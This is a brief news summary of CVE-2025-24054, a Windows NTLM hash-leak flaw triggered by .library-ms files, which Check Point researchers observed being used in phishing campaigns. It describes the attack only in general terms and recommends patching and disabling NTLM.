A Windows flaw (CVE-2025-24054) allowing NTLM hash leakage through .library-ms files is now being actively used in phishing attacks against government agencies and private companies.
Although initially considered unlikely to be exploited, Check Point researchers observed real-world abuse of the flaw shortly after Microsoft issued a fix in March 2025.
The attacks involve phishing emails with Dropbox links to .library-ms files, which, when interacted with, prompt Windows to connect to a remote SMB server controlled by the attacker—automatically sending NTLM authentication data.
These campaigns require minimal user interaction, making them especially dangerous.
In later waves, attackers even dropped the ZIP archive step, proving that simply downloading the malicious file was enough to trigger the exploit.
Despite its "medium" severity rating, the flaw can lead to serious breaches like privilege escalation, prompting experts to recommend disabling NTLM and applying the latest updates immediately.
Read more...